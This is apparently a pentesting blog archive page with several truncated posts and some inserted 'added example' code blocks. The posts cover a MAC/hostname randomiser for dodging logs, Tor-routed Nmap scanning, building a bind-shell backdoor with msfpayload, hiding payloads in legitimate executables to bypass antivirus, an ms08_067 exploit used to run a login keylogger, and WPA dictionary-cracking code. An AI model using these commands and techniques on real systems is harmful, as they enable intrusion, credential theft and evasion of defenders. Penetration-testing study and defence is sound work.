When conducting a pentest, one of the first things the pentester should do is change the computer's MAC address and hostname, because both end up in logs and in the DHCP server's lease table. Macxchange is a very simple script that does this. It is meant to work with BackTrack or any other Linux distro. It picks a random word from the John the Ripper wordlist for the hostname and uses macchanger for the MAC address. Once your MAC and hostname have been changed, remember to restart networking or request a new lease with "dhclient <interface>". If you're using a distro other than BackTrack, make sure macchanger is installed, and edit the wordlist variable to point at a wordlist you have. The script has to run as root, and it only changes the hostname of the running system (it does not touch /etc/hostname or /etc/hosts), so the change does not survive a reboot. You can also download the script from here.

#!/bin/bash
#author: Jorge L. Vazquez
#purpose: this script will change the mac address to random
#and will pick a random word from password.lst in jtr for hostname
#change variables "INTERFACE" and "FILE" to your settings
#also macchanger needs to be installed

INTERFACE=eth0
FILE=/pentest/passwords/jtr/password.lst

#ifconfig, macchanger and hostname all need root
if [ "$(id -u)" -ne 0 ]; then
	echo "This script must be run as root" >&2
	exit 1
fi

#only keep words that are valid hostname labels (letters, digits, hyphens,
#max 63 chars); this also skips the "#!comment:" lines at the top of password.lst
WORD=$(grep -E '^[a-zA-Z0-9]([a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?$' "$FILE" | sort -R | head -1)
if [ -z "$WORD" ]; then
	echo "No usable word found in $FILE" >&2
	exit 1
fi

#changing mac address to random
if ifconfig "$INTERFACE" down > /dev/null; then
	printf "\nChanging mac address...\n"
	macchanger -r "$INTERFACE"
else
	printf "Script encountered an error, sorry...\n"
	exit 1
fi

#changing hostname to random word from password.lst
printf "\nChanging Hostname...\n"
OLDHOST=$(hostname)
if hostname "$WORD"; then
	printf "Previous Hostname: %s\n" "$OLDHOST"
	printf "Random Hostname: %s\n" "$WORD"
else
	printf "Script encountered an error, sorry...\n"
	exit 1
fi

#putting interface up
ifconfig "$INTERFACE" up > /dev/null
printf "\n"

#END


If you want to scan a host without it seeing your own address, proxychains is about as good as it gets, because it pushes the Nmap scan through Tor. In other words, you feed an application to proxychains, in this case Nmap, and its connections go out through Tor's local SOCKS proxy. ProxyChains lets you run SSH, Telnet, VNC, FTP and other network applications from behind HTTP(S) and SOCKS(4/5) proxy servers, and it tunnels TCP and DNS through those proxies. It does this by hooking connect() with LD_PRELOAD, so only TCP connections made through the C library are redirected: avoid UDP scans, raw-socket scan types such as SYN scan (-sS) and OS detection (-O), and host discovery through ICMP (ping), all of which go straight out your real interface and reveal your address. The options for this are "-n", telling Nmap not to resolve hostnames, and "-PN" (spelled "-Pn" in current Nmap), telling Nmap not to ping the host. Also, the Tor network is slow, so be patient! I'm doing this in BackTrack, so I will not go over the installation of Nmap, proxychains and Tor because they are all there. But you may want to check proxychains.conf and make sure you have these settings.

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4  127.0.0.1 9050

The "-sTV" options tell Nmap to do a full TCP connect scan with version detection (the connect scan is the one scan type that goes through connect() and therefore through the proxy), "-PN" tells Nmap not to ping the remote host, "-n" not to do any DNS lookups, and finally "-p" selects the ports.

root@bt:~# proxychains  nmap -sTV -PN -n -p21,22,25,80 64.13.134.52
ProxyChains-3.1 (http://proxychains.sf.net)
 
Starting Nmap 5.35DC1 ( http://nmap.org ) at 2010-10-03 20:12 EDT
|S-chain|-<>-127.0.0.1:9050-<><>-64.13.134.52:25-<--timeout
|S-chain|-<>-127.0.0.1:9050-<><>-64.13.134.52:22-<><>-OK
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
|S-chain|-<>-127.0.0.1:9050-<><>-64.13.134.52:21-<--timeout
|S-chain|-<>-127.0.0.1:9050-<><>-64.13.134.52:80-<><>-OK
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
|S-chain|-<>-127.0.0.1:9050-<><>-64.13.134.52:22-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-64.13.134.52:80-<><>-OK
Nmap scan report for 64.13.134.52
Host is up (12s latency).
PORT   STATE  SERVICE VERSION
21/tcp closed ftp
22/tcp open   ssh     OpenSSH 4.3 (protocol 2.0)
25/tcp closed smtp
80/tcp open   http    Apache httpd 2.2.3 ((CentOS))
 
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.64 seconds
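Because the only thing keeping a proxychains scan inside Tor is the choice of Nmap options, it is worth putting that rule into a wrapper that refuses to start a scan that would leak. The following is an added example, not code from the original post or from the proxychains or Nmap projects. It assumes proxychains and nmap are on the PATH, accepts only connect-scan options (-sT, -sV, -Pn/-PN, -n, plus neutral ones like -p), and rejects raw-socket scan types, OS detection, traceroute and ICMP/ARP host-discovery probes before proxychains is ever invoked.

```python
#!/usr/bin/env python3
"""Refuse to run Nmap under proxychains unless every option only needs TCP connect().

proxychains works by LD_PRELOAD-hooking connect(), so raw-socket scan types
(-sS, -sU, -sA, -O, ICMP ping probes, traceroute) are sent on the real
interface and bypass Tor entirely. Added example wrapper, not part of the
original post; assumes "proxychains" and "nmap" are on the PATH.
"""
import os
import sys

# Letters allowed after -s: T (connect scan) and V (version probes over connect()).
SAFE_SCAN_LETTERS = set("TV")
# Options that always send raw packets regardless of scan type.
RAW_OPTIONS = {"-O", "-A", "--traceroute"}


def check_nmap_args(args):
    """Return (ok, reason). ok is True only when the scan cannot leak outside the proxy."""
    have_connect = have_pn = have_n = False
    for arg in args:
        if arg in RAW_OPTIONS:
            return False, f"{arg} needs raw packets and bypasses proxychains"
        if arg.startswith("-s") and not arg.startswith("--"):
            letters = arg[2:]
            bad = set(letters) - SAFE_SCAN_LETTERS
            if bad:
                return False, f"scan type {arg} uses raw sockets ({''.join(sorted(bad))})"
            have_connect = have_connect or "T" in letters
        elif arg in ("-Pn", "-PN"):
            have_pn = True
        elif arg.startswith("-P"):
            return False, f"host discovery option {arg} sends ICMP/ARP/raw probes outside the proxy"
        elif arg == "-n":
            have_n = True
    if not have_connect:
        return False, "add -sT: Nmap's default scan as root is a raw SYN scan"
    if not have_pn:
        return False, "add -Pn: ping discovery uses ICMP/raw probes"
    if not have_n:
        return False, "add -n: Nmap's reverse-DNS lookups go out over UDP from its own resolver"
    return True, "ok"


def main(argv):
    ok, reason = check_nmap_args(argv)
    if not ok:
        print(f"refusing to scan: {reason}", file=sys.stderr)
        return 2
    # Only reached for connect-only option sets; replace this process with the real scan.
    os.execvp("proxychains", ["proxychains", "nmap", *argv])


if __name__ == "__main__":
    sys.exit(main(sys.argv[1:]))
```

Save it as, say, torscan.py and run `python3 torscan.py -sTV -Pn -n -p21,22,25,80 64.13.134.52`; anything that would bypass the proxy is refused with the reason printed, so a habit-driven `-sS` or `-O` never reaches the wire.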


There are different ways to drop a backdoor on a target machine with meterpreter. For example, netcat can be uploaded to the victim and, with a few registry hacks, the backdoor runs when the user logs in, giving shell access; however, there are a few drawbacks with this method. First, it requires editing the registry and creating new keys (a lengthy process). Second, upon user login you can see netcat run for a split second and close. It doesn't take a savvy user to know something is up. And third, it is an unauthenticated backdoor, which means it is open to anyone who can reach the port. The two approaches I'm taking here are also unauthenticated, which is not recommended, but sometimes that is the only choice, and, more importantly, they are already built into Metasploit.
The first method is the payload "shell_bind_tcp", which is the equivalent of netcat but without any registry editing. Pauldotcom has an excellent tutorial about this. For this tutorial I'm assuming we already have a meterpreter session going.

First, we create our backdoor. msfpayload takes its options as separate VAR=value arguments, and the final "x" selects Windows executable output:
msfpayload windows/shell_bind_tcp RHOST=192.168.1.100 LPORT=4444 x > evil.exe
RHOST is the remote box where your backdoor will be running, listening on LPORT for connections. (msfpayload has since been replaced by msfvenom, which takes the same payload name and options.)

Posted on 24-09-2010
Filed Under (metasploit, pentesting, security) by admin

One of the cool features of Metasploit is the ability to encode your payload into an executable; furthermore, msfencode's "-x" option lets you select a template, which can be a legitimate executable like putty, calc or notepad, to embed your payload in, making it more difficult to detect. Now, when trying to bypass antivirus, it is best to use a "stager" rather than a full, single payload... why? Well, a stager is a small piece of code that allocates memory, opens a network connection to the framework, and then downloads the rest of the payload (the "stage") into that memory. A stager is very small, and it is partly because of its size that antivirus has a hard time matching a signature to it, whereas a single payload carries everything needed to execute and gives the scanner much more to match. So first we will create an executable using a single payload and put it through AV scans.

msfpayload windows/shell_bind_tcp RHOST=192.168.1.100 LPORT=4444 x > svchost10.exe

Now, let’s put it through AV scans, and….


Posted on 12-09-2010
Filed Under (pentesting, security) by admin

So you have a meterpreter session on a remote client, and now you want the password hashes; but sometimes you can't use "hashdump" from meterpreter, especially if your session is not running as a user with admin privileges. So how could you get the remote user's password? Well, Metasploit has a script called "keylogrecorder", which has an option to log off the user and record the password typed at the next login. Note that for this to work, you need to migrate your process into "winlogon.exe".
STEPS:
1- Ok, the first thing is to get a meterpreter session going. For this we’ll use a “netapi” exploit.

msf > search netapi
[*] Searching loaded modules for pattern 'netapi'...
 
Exploits
========
 
   Name                         Rank    Description
   ----                         ----    -----------
   windows/smb/ms03_049_netapi  good    Microsoft Workstation Service NetAddAlternateComputerName Overflow
   windows/smb/ms06_040_netapi  great   Microsoft Server Service NetpwPathCanonicalize Overflow
   windows/smb/ms06_070_wkssvc  normal  Microsoft Workstation Service NetpManageIPCConnect Overflow
   windows/smb/ms08_067_netapi  great   Microsoft Server Service Relative Path Stack Corruption
 
msf> use exploit/windows/smb/ms08_067_netapi

2- Now we need to set the options for this exploit.

msf exploit(ms08_067_netapi)> show options
 
Module options:
 
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
 
Exploit target:
 
   Id  Name
   --  ----
   0   Automatic Targeting
 
msf exploit(ms08_067_netapi)> set RHOST 172.16.10.105
RHOST => 172.16.10.105


Posted on 08-09-2010
Filed Under (pentesting, security, wireless) by admin

Ok, the previous video was kind of outdated, so I posted a new one. Credits to g0tmi1k. This video goes beyond just cracking WPA; it also shows how the different tools perform, and it explains the methodology really simply. Let me say that cracking WPA is not like cracking WEP: in WEP you're exploiting a weakness in how the RC4 encryption is used (weak and reused IVs), but in WPA-PSK the only weakness is the strength of the user's passphrase. Yes, you've guessed it: when cracking WPA, what you're doing is brute-forcing the user's passphrase, so the success of your attack depends on your dictionary or password list. If the user's passphrase is not in your dictionary, you will never crack the WPA key. There are several WPA dictionaries out there, but I highly recommend precomputed hash tables, which can be several gigabytes in size (they are often called rainbow tables, although they are really PMK tables computed for one specific SSID, since the key derivation salts the passphrase with the network name, so a table built for "linksys" is useless against any other SSID). How to find them?... Google is your friend!
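To make the passphrase point concrete, here is the key derivation that every WPA/WPA2-PSK cracker is really grinding through, as an added example that is not from the original post or the video. The PMK is PBKDF2-HMAC-SHA1 over the passphrase salted with the SSID, 4096 rounds, which is why a dictionary run is slow, why a table precomputed for one SSID is useless against another, and why candidates shorter than 8 or longer than 63 characters can be skipped. The wordlist is constructed inline and the target PMK is derived from a known passphrase so the code runs offline; a real attack instead checks each candidate against the MIC in a captured 4-way handshake, which is not shown here.

```python
#!/usr/bin/env python3
"""WPA/WPA2-PSK dictionary attack, reduced to the key derivation that makes it slow.

Added example, not from the original post. The PMK is
PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits) as defined in
IEEE 802.11i, so every wordlist candidate costs 4096 HMAC rounds per SSID.
The target PMK here comes from a known passphrase (constructed, to run
offline); real tools compare against the handshake MIC instead.
"""
import hashlib


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Pairwise Master Key: PBKDF2-HMAC-SHA1, SSID as salt, 4096 iterations, 32 bytes."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, dklen=32)


def dictionary_attack(ssid: str, target_pmk: bytes, wordlist):
    """Try each candidate passphrase against target_pmk for this SSID.

    Returns (passphrase, attempts) on success or (None, attempts) if the
    passphrase is not in the list. Words outside the 8..63 character range
    the spec allows are skipped without spending the PBKDF2 work.
    """
    attempts = 0
    for word in wordlist:
        word = word.rstrip("\n")
        if not 8 <= len(word) <= 63:
            continue
        attempts += 1
        if wpa_pmk(word, ssid) == target_pmk:
            return word, attempts
    return None, attempts


# Constructed wordlist standing in for a dictionary file ("letmein" is too short to be a PSK)
SAMPLE_WORDLIST = ["letmein", "qwerty123", "ThisIsAPassword", "password", "correcthorse"]


def demo():
    """Return (pmk_depends_on_ssid, recovered_passphrase, attempts, result_for_missing_word)."""
    # Same passphrase, different SSIDs: different PMKs, so precomputed tables are per-SSID
    pmk_ieee = wpa_pmk("password", "IEEE")
    pmk_other = wpa_pmk("password", "linksys")
    found, tries = dictionary_attack("IEEE", pmk_ieee, SAMPLE_WORDLIST)
    missing, _ = dictionary_attack("IEEE", wpa_pmk("NotInTheList", "IEEE"), SAMPLE_WORDLIST)
    return pmk_ieee != pmk_other, found, tries, missing


if __name__ == "__main__":
    differ, found, tries, missing = demo()
    print("PMK depends on SSID:", differ)
    print("recovered:", found, "after", tries, "candidates")
    print("passphrase not in wordlist:", missing)
```

The passphrase/SSID pair "password"/"IEEE" is the published 802.11i test vector, so wpa_pmk can be checked against the standard before trusting it on a real capture.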


If you're like me, you test pretty much any OS and app in some sort of virtual environment. In my case I use VMware Workstation, so when I decided to test BackTrack 4 Final I needed to install VMware Tools, and here I go over the commands needed to install them.

1- First go to VM->Install VMware Tools (the figure shows "Reinstall VMware Tools" because I had previously installed it, but yours should say "Install").

